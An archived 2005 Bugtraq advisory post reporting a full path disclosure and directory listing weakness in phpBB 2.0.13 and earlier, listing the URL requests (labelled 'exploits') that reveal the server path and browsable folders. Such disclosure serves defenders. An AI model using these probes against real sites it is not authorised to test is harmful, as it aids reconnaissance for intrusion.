Bugtraq mailing list archives
[phpbb <= 2.0.13 full path disclosure & directory listing]
From: JoCaNoR SeCuRiTy TeaM <jocanor () gmail com>
Date: 18 Mar 2005 19:21:17 -0000
[phpbb <= 2.0.13 full path disclosure & directory listing] Author: Jocanor Date= 18-03-2k5 1. -----------introduction-------- phpbb is an high-customizable bulletin board writed in php. Oficial page: http://www.phpbb.com 1. ------------Full path disclossure------------ This error is non critical...but you can get the full path to the forum in the system. exploit: http://www.example.com/db/oracle.php Fatal error: Cannot redeclare sql_nextid() in /www/phpbb2/db/oracle.php on line 405 2.---------Directory listing--------- default installation of phpbb have some directoryes with no index.* file, with this low risc bug you can obtain information of the system, like http daemon. exploits: http://www.example.com/images/smiles/ http://www.example.com/templates/subSilver/images/lang_english/ http://www.example.com/docs/ 3-----greetz-------- /dev/null 4----- Contact ----- Author: Jocanor Location: Spain Email: jocanor [at] gmail [dot] com JoCaNoR SeCuRiTy ReaSoNS EOF.
Current thread:
- [phpbb <= 2.0.13 full path disclosure & directory listing] JoCaNoR SeCuRiTy TeaM (Mar 18)
- RE: [phpbb <= 2.0.13 full path disclosure & directory listing] Paul S. Owen (Mar 18)